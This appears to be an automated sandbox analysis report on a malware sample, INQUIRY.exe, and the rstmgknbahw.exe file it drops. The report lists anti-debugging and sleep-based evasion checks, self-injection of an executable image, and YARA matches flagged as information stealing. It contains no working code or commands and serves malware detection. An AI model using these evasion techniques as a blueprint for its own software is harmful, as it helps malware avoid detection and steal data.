      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\INQUIRY.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-4078
      Source: C:\Users\user\Desktop\INQUIRY.exe TID: 4728Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 6512Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 5156Thread sleep count: 43 > 30Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 2440Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 3136Thread sleep count: 35 > 30Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe TID: 6656Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeWindow / User API: threadDelayed 384Jump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeWindow / User API: foregroundWindowGot 965Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeAPI coverage: 9.8 %
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00405D7C FindFirstFileA,FindClose,1_2_00405D7C
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_004053AA
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00402630 FindFirstFileA,1_2_00402630
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00404A29 FindFirstFileExW,4_2_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_00404A29 FindFirstFileExW,4_1_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_00405D7C FindFirstFileA,FindClose,5_2_00405D7C
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_004053AA
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 5_2_00402630 FindFirstFileA,5_2_00402630
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00404A29 FindFirstFileExW,6_2_00404A29
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_00404A29 FindFirstFileExW,6_1_00404A29
      Source: C:\Users\user\Desktop\INQUIRY.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeAPI call chain: ExitProcess graph end nodegraph_1-3738
      Source: C:\Users\user\Desktop\INQUIRY.exeAPI call chain: ExitProcess graph end nodegraph_1-3737
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeAPI call chain: ExitProcess graph end nodegraph_4-9918
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeAPI call chain: ExitProcess graph end nodegraph_5-3238
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeAPI call chain: ExitProcess graph end nodegraph_5-3234
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeAPI call chain: ExitProcess graph end nodegraph_6-11141
      Source: INQUIRY.exe, 00000002.00000003.878664551.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.774619446.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825484373.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.891624321.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.733579764.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.759637821.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.683832715.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.878647519.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.670540587.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.786041516.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825616062.0000000000815000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.865016296.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.705623191.000000000080B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040446F
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405DA3
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_004067FE GetProcessHeap,4_2_004067FE
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A0402 mov eax, dword ptr fs:[00000030h]1_2_021A0402
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A0616 mov eax, dword ptr fs:[00000030h]1_2_021A0616
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A0706 mov eax, dword ptr fs:[00000030h]1_2_021A0706
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A0744 mov eax, dword ptr fs:[00000030h]1_2_021A0744
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_021A06C7 mov eax, dword ptr fs:[00000030h]1_2_021A06C7
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_004035F1 mov eax, dword ptr fs:[00000030h]4_2_004035F1
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_004035F1 mov eax, dword ptr fs:[00000030h]4_1_004035F1
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_004035F1 mov eax, dword ptr fs:[00000030h]6_2_004035F1
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_004035F1 mov eax, dword ptr fs:[00000030h]6_1_004035F1
      Source: C:\Users\user\Desktop\INQUIRY.exeMemory allocated: page read and write | page guardJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00401E1D SetUnhandledExceptionFilter,4_2_00401E1D
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0040446F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00401C88
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00401F30
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_00401E1D SetUnhandledExceptionFilter,4_1_00401E1D
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_0040446F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_1_00401C88
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_1_00401F30
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00401E1D SetUnhandledExceptionFilter,6_2_00401E1D
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_0040446F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00401C88
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00401F30
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_00401E1D SetUnhandledExceptionFilter,6_1_00401E1D
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_0040446F
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_00401C88
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 6_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_00401F30

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\INQUIRY.exeMemory written: C:\Users\user\Desktop\INQUIRY.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\INQUIRY.exeProcess created: C:\Users\user\Desktop\INQUIRY.exe "C:\Users\user\Desktop\INQUIRY.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" Jump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeProcess created: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" Jump to behavior
      Source: INQUIRY.exe, 00000002.00000002.917971257.00000000007D9000.00000004.00000020.sdmpBinary or memory string: X"~Program Manager$
      Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.917971257.00000000007D9000.00000004.00000020.sdmp, INQUIRY.exe, 00000002.00000002.918737998.0000000002B9A000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmp, INQUIRY.exe, 00000002.00000002.918753295.0000000002BB6000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918570208.00000000029AC000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918544054.000000000299F000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918712708.0000000002B8A000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918560831.00000000029A7000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: INQUIRY.exe, 00000002.00000002.918267849.0000000000E50000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: INQUIRY.exe, 00000002.00000003.825484373.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.733579764.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.759637821.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.683832715.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.670540587.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825616062.0000000000815000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.865016296.0000000000813000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.705623191.000000000080B000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.812351194.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.838969103.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.838991506.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.856693810.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.697406169.0000000000816000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.825517657.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.718632163.000000000080D000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.747066430.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.710595291.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.692336980.0000000000814000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.799544616.0000000000812000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000003.692368806.0000000000815000.00000004.00000001.sdmpBinary or memory string: Program Managert$
      Source: INQUIRY.exe, 00000002.00000002.918518466.0000000002965000.00000004.00000001.sdmpBinary or memory string: Program Managerr
      Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmp, INQUIRY.exe, 00000002.00000002.918570208.00000000029AC000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: INQUIRY.exe, 00000002.00000002.918728460.0000000002B90000.00000004.00000001.sdmpBinary or memory string: Program ManagerPG
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_0040208D cpuid 4_2_0040208D
      Source: C:\Users\user\Desktop\INQUIRY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exeCode function: 4_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00401B74
      Source: C:\Users\user\Desktop\INQUIRY.exeCode function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,1_2_00405AA7

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.37a3258.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.2.rstmgknbahw.exe.2411458.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.3820e14.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.0.rstmgknbahw.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.6d8d50.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.1.rstmgknbahw.exe.415058.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.rstmgknbahw.exe.2300000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.0.INQUIRY.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.rstmgknbahw.exe.415058.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.0.rstmgknbahw.exe.415058.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.rstmgknbahw.exe.382543d.7.raw.unpack, type: UNPACKEDPE
